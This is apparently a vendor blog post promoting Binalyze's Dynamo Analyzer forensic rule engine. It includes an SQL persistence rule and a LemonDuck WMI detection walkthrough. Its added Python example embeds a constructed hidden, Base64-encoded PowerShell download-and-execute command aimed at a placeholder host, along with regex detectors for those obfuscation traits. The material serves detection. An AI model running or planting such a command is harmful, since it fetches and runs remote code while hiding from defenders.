Dynamo Analyzer: When YARA isn’t enough!

Last updated: 21st June 2024

In a landscape where rapid and precise threat detection across the assets in your IT estate is crucial, the Binalyze Dynamo Analyzer, part of AIR’s Automated Compromise Assessment capability (DRONE), bridges the gap between traditional Security Information and Event Management (SIEM) systems and advanced asset analysis technologies. Dynamo Analyzer is Binalyze AIR’s rule engine, and it is transforming how threats are detected, analyzed, and managed directly from your specified evidence collections.

Introducing Dynamo: Advanced Threat Detection

Dynamo is not just another tool in your Investigation and Response arsenal. In Binalyze AIR it revolutionizes threat detection, analysis, and management directly on evidence collected from your assets, whether on Windows, Linux, or macOS. Dynamo's unique approach involves the active collection, parsing, and sophisticated rule-based analysis of asset data, ensuring rapid and accurate threat detection.

Dynamo's Core Functionalities

  • Software Vulnerability Detection: Dynamo can scan for outdated software installations using a comprehensive database of known vulnerabilities. It employs heuristic analysis to detect potential vulnerabilities that may not yet be cataloged.
  • DNS Cache and Scheduled Task Analysis: Dynamo analyzes DNS cache records to identify domains linked to known malicious activities. It evaluates scheduled tasks, focusing on anomalies in task configurations and execution paths that are commonly exploited by malware.
  • Fileless Malware Detection: Dynamo's advanced algorithms detect fileless malware by parsing collected evidence and matching relevant items with a large, ever-growing set of detection rules.
  • Analyzing Parsed Forensic Evidence: Binalyze AIR’s evidence collection capability is widely respected, and the forensic collections from assets are stored in an SQL database. This allows Dynamo to deliver complex SQL script-based queries against the collected data, which can be further enhanced with uGO scripting language for more advanced logic, enabling sophisticated pattern detection analysis.

We could say that the uGO Scripting Language serves as an advanced integration and orchestration framework designed to seamlessly connect and leverage the capabilities of various engines such as YARA, Sigma, osquery, and more. It empowers users with the flexibility to define custom workflows and logic, enabling the correlation of diverse inputs from these engines. This holistic approach significantly enhances the decision-making process, providing more accurate and comprehensive verdicts. uGO's versatile scripting capabilities facilitate efficient threat detection, system analysis, and security automation, making it an invaluable tool in complex IT environments.

  • Integration with osquery: Dynamo can leverage osquery for advanced system queries. This integration allows Dynamo to perform an in-depth analysis of system states and configurations, enhancing its detection capabilities.
  • Correlation Rule Capabilities: Dynamo's advanced correlation engine can aggregate individual findings to identify complex threat patterns. This enables Dynamo to transform low-level signals into actionable high-fidelity alerts.

Technical Specifications:

  • Data Parsing: Dynamo uses advanced parsing algorithms capable of interpreting complex data structures from various sources, including system logs and network traffic.
  • Alert Mechanism: Implements a sophisticated alerting mechanism that categorizes threats based on severity, impact, and confidence levels.
  • Integration: Offers seamless integration with existing security infrastructure investments, including SIEM systems, threat intelligence platforms, and incident response workflows.
  • File Formats: Supports a wide range of file formats for analysis, including but not limited to EVT, EVTX, SQL, and various other binary and text-based log formats.

Advantages of Dynamo

  • On-Asset Analysis: By performing analysis on the asset, Dynamo minimizes the latency and bandwidth issues associated with data transfer, ensuring timely detection even in bandwidth-constrained environments.
  • Privacy & Compliance: Dynamo addresses privacy and compliance concerns by processing data locally on the asset (for example, endpoints and servers), reducing the need to export sensitive data.
  • Customization: Dynamo lets Binalyze customize its own detection rules and analysis parameters, so that it can respond at speed to new security postures and an evolving threat landscape.

Our Dynamo implementation is seamlessly integrated within DRONE, alongside our suite of proprietary analyzers, and is ready to meticulously analyze any evidence gathered during your evidence acquisition processes.

Fig1

The data you collect with AIR is saved to an SQL database (case.db) which is part of the overall .ppc file that is generated for each Tasking Assignment run by the AIR agent on an asset.

Binalyze’s DFIR Lab, our team of in-house researchers and threat hunters, is constantly adding new SQL queries to the Dynamo Analyzer, which in turn interrogates the evidence collected in the case.db file.

Dynamo Analyzer Example

A very simple example of such a rule might look like this. Here Dynamo searches the collected evidence for an attempt at achieving ‘persistence’ on the asset by scheduling an application in the Windows Temp folder to run automatically:

SELECT * FROM autoruns_scheduled_tasks
WHERE command_line LIKE '%\Windows\Temp\%'

The SQL queries written by our DFIR Lab using Dynamo are typically much more advanced and are crafted to swiftly identify and grade Findings, thereby guiding the user's investigation more efficiently.

Let’s look at an example where our implementation of Dynamo has delivered findings into AIR’s Investigation Hub.

Fig2

Here we see 4 findings marked as ‘High’, and the Finding column explains that these items are ‘WMI suspicious commands’.

A closer inspection of the Investigation Hub details window reveals that:

  • The PowerShell command was hidden.
  • Conversion from Base64 was used.
  • The domain URL has been obfuscated by concatenation.

Fig3

For these reasons, this WMI command is marked as a ‘High’ severity finding by DRONE.
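As an added example (not Binalyze's code, and not AIR's real case.db schema), the following Python builds a constructed SQLite stand-in for case.db, runs the scheduled-task rule quoted earlier against it, and then grades WMI command lines on the three traits listed above (hidden window, Base64 encoding, URL split by concatenation). The wmi_consumers table, all column names, the sample rows and the severity mapping are assumptions made for this illustration.

```python
import base64
import re
import sqlite3

# Constructed stand-in for the case.db inside a .ppc collection. The
# autoruns_scheduled_tasks table is named in the post; wmi_consumers and
# both tables' columns are assumptions for this example, not AIR's schema.
SCHEMA = """
CREATE TABLE autoruns_scheduled_tasks (task_name TEXT, command_line TEXT);
CREATE TABLE wmi_consumers (consumer_name TEXT, command_line TEXT);
"""
# Constructed obfuscated payload: the download URL is split by string
# concatenation, then UTF-16LE Base64-encoded as -EncodedCommand expects.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://mal.'+'example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
ROWS = {  # constructed sample evidence rows
    "autoruns_scheduled_tasks": [
        ("UpdateCheck", r"C:\Windows\Temp\upd.exe /silent"),
        ("Defrag", r"C:\Windows\System32\defrag.exe -c"),
    ],
    "wmi_consumers": [
        ("SysMon", f"powershell.exe -WindowStyle Hidden -EncodedCommand {ENCODED}"),
        ("Backup", r"cmd.exe /c copy C:\data\*.db D:\bak"),
    ],
}
# The scheduled-task rule from the post (SQLite LIKE treats the backslash
# literally, so no ESCAPE clause is needed).
TEMP_TASK_RULE = r"SELECT task_name FROM autoruns_scheduled_tasks WHERE command_line LIKE '%\Windows\Temp\%'"

def build_case_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    for table, rows in ROWS.items():
        conn.executemany(f"INSERT INTO {table} VALUES (?, ?)", rows)
    return conn

def temp_folder_tasks(conn):
    return [name for (name,) in conn.execute(TEMP_TASK_RULE)]

def grade_wmi_command(cmd):
    """Return (severity, indicators) for the three traits the post lists."""
    found = []
    if re.search(r"-w(?:indowstyle)?\s+hidden", cmd, re.I):
        found.append("hidden_window")
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    text = cmd
    if m:  # inspect the decoded script, not just the Base64 blob
        found.append("base64")
        text = base64.b64decode(m.group(1)).decode("utf-16-le", "replace")
    if re.search(r"['\"]\s*\+\s*['\"]", text):  # 'a'+'b' string splicing
        found.append("concatenation")
    severity = {3: "High", 2: "Medium", 1: "Low"}.get(len(found), "None")
    return severity, found

def wmi_findings(conn):
    rows = conn.execute("SELECT consumer_name, command_line FROM wmi_consumers")
    return {name: grade_wmi_command(cmd) for name, cmd in rows}
```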

From here, the investigator could inspect the DNS cache in the Investigation Hub; in our case, we can see a ‘Low’ finding which reveals the URL in its unobfuscated state.

Fig4

Selecting the embedded VirusTotal Details or VTRelations link immediately identifies that this WMI command and the subsequent DNS cache entry are associated with the well-known malware LemonDuck.

Fig5

In conclusion

Dynamo Analyzer is a comprehensive security solution that fills the gaps left by traditional tools like YARA. By offering advanced functionalities, such as fileless malware detection and DNS cache analysis, Dynamo provides a more robust and nuanced approach to threat detection and system security.

Since its initial addition to DRONE, Dynamo Analyzer has undergone continuous enhancements, further solidifying its role in incident response and cybersecurity. At the heart of DRONE, Dynamo Analyzer is designed to seamlessly identify vulnerable assets, whether individually or across vast networks, making it a crucial automated analysis tool provided by AIR to ensure a secure and resilient cybersecurity infrastructure. Future AIR releases will continue to expand the development of Dynamo rulesets and, eventually, open up Dynamo to users, allowing them to apply their own custom rules to the engine. This ongoing evolution aims to empower users with greater control and flexibility in their security measures.

When combining Dynamo Analyzer with all the other DRONE capabilities, you can finally say goodbye to the tedious search for the proverbial needle in a haystack and reallocate that valuable time to other vital aspects of the investigation process.

To learn more about how the Dynamo Analyzer can supercharge your investigation and threat-hunting efforts, contact us today or try it for yourself.